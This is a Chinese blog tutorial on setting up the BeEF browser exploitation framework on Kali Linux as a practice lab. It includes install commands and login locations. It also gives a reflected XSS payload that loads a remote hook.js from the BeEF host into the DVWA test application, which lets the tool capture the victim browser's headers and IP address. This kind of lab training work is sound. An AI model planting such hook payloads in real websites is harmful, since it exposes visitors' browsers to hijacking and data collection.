在kali环境下安装Beef-Xss靶场搭建

奈何＠_＠2023-09-02 23:51

目录

一、更新安装包

二、安装beef-xss

三、启动Beef-Xss工具

1、查看hook.js

2、查看后台登录地址

3、查看用户名和登录密码

4、登录页面

[5、点击 Hook me:将配置的页面导入BEEF中](#5、点击 Hook me:将配置的页面导入BEEF中)

一、更新安装包

┌──(root㉿kali)- $/home/kali$

└─# apt-get update

二、安装beef-xss

┌──(root㉿kali)- $/home/kali$

└─# apt-get install beef-xss

三、启动Beef-Xss工具

第一次启动会提示你需要输入密码

1、查看hook.js

http://192.168.17.130:3000/hook.js

可见代码之复杂，功能之多

2、查看后台登录地址

http://192.168.17.130:3000/ui/authentication

3、查看用户名和登录密码

┌──(root㉿kali)- $/home/kali$

└─# cd /usr/share/beef-xss

┌──(root㉿kali)- $/usr/share/beef-xss$

└─# ls -al

┌──(root㉿kali)- $/usr/share/beef-xss$

└─# vim /etc/beef-xss/config.yaml

4、登录页面

5、点击 Hook me:将配置的页面导入BEEF中

在DVWA的反射型XSS中注入BEEF配置页面hook.js

<script src="//192.168.17.130:3000/hook.js">

提交后：

此时BEEF中监控已经上线：

可获取http请求头，服务器类型，IP地址等信息

攻击连接意图：

上一篇：Java反射、代理机制

下一篇：结构化日志记录增强网络安全性

热门推荐

01HTTP 与 HTTPS 的区别：从原理到实战详解 022026年6月AI行业全景：从百模大战到Agent元年，这30天发生了什么？032026 AI 编程工具终极实战指南：Cursor vs Claude Code vs Copilot，开发者该怎么选？04【AI】2026 年具身智能模型和世界模型总结 05GitHub 镜像站点 062026 年 AI 编程工具终极横评：Cursor vs Claude Code vs Copilot vs Windsurf 07AI科技热点日报 | 2026年6月1日 08上线仅72小时被强制下架：Claude Fable 5 的短命 09Claude Code、Codex、Cursor三分天下：2026年AI编程Agent生态全景剖析 10《置身钉内》原文-可播放阅读